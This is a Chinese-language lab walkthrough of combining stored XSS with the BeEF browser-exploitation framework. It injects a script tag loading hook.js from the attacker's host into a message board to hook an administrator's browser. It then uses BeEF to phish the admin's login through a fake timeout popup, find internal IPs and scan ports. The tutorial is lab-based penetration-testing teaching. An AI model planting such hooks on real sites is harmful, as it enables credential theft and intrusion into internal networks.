BeEF結合存儲型XSS的利用

XSS就不過多介紹或闡述了

實驗原理

BeEF是一種專注於Web瀏覽器的滲透測試工具。

BeEF允許專業滲透測試人員使用客戶端攻擊媒介來評估目標環境的實際安全狀況。BeEF超越了強化的網絡邊界和客戶端系統,並在一個敞開的大門環境中檢查可利用性:Web瀏覽器。 BeEF將掛鉤一個或多個Web瀏覽器,並將它們用作啓動定向命令模塊以及從瀏覽器上下文中對系統進一步攻擊。
 

實驗場景

這裏的攻擊網絡一般是指攻擊內網。想象一下這樣的場景:當一個公司內部網絡的瀏覽器被BeEF勾住了,那麼可不可以使用它來攻擊這個內部網絡呢?比如主機掃描,端口掃描等…答案是可以的
 

實驗設備

操作機:Kali Linux主機 * 1臺(192.168.20.10),BeEF
靶機:Windows 2003主機 * 1臺(192.168.20.20)
 

實驗步驟

一、到/usr/share/beef-xss目錄下,執行命令./beef
在這裏插入圖片描述
在這裏插入圖片描述
二、打開靶機瀏覽器訪問頁面。打開留言板功能
在內容處輸入惡意代碼並提交<script src=\'http://192.168.20.10:3000/hook.js\'></script>
在這裏插入圖片描述
三、管理員登錄後臺點擊留言管理功能
(被勾住)
在這裏插入圖片描述
四、攻擊者進入BeEF管理界面,默認賬號和密碼都是beef
在這裏插入圖片描述
五、管理界面
查看已上鉤的靶機,自動收集瀏覽器信息
在這裏插入圖片描述
六、管理界面及攻擊模塊介紹
HOOK持續的時間爲關閉測試頁面爲止。在此期間,相當於被控制了,可以發送攻擊命令了。選擇commands欄,可以看到很多已經分好類的攻擊模塊
在這裏插入圖片描述
在分類內部,BeEF可以檢測出哪些命令模塊可以在當前受害的瀏覽器工作, 並用顏色表示,如下所示:
綠色:命令模塊可以在目標瀏覽器上運行,且用戶不會感到任何異常
灰色:命令模塊尚未針對此目標進行驗證,即不知道能否可運行
橙色:命令模塊可以在目標瀏覽器上運行,但是用戶可能會感到異常(比如可能會有彈窗,提示,跳轉等)
紅色:命令模塊不適用於此目標
在這裏插入圖片描述
執行之前
在這裏插入圖片描述
七、嘗試利用一
嘗試社會工程學。例如,提交登錄信息…
Social Engineering模塊下的Pretty Theft功能:在網頁彈出誘騙消息需要用戶輸入登錄和密碼,並解釋該會話已超時,選擇的登錄框模板,這裏我們選擇Facebook
在這裏插入圖片描述
在鉤子頁面彈出登錄框
在這裏插入圖片描述
獲取到管理員的登錄賬號密碼
在這裏插入圖片描述
八、嘗試利用二
可以嘗試利用瀏覽器掃描內網,首先是獲取內網IP
Get Internal IP WebRTC模塊:通過WebRTC獲取未經過NAT的內網IP
在這裏插入圖片描述
九、嘗試利用三
端口掃描
Port Scanner模塊,先要配置IP,掃描默認端口
在這裏插入圖片描述
掃描結果
在這裏插入圖片描述
 
更多利用方式需讀者根據自身情況去研究哦
GOT IT!

 
******************************************************
小實驗小結,更多利用方式需深一步瞭解~

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章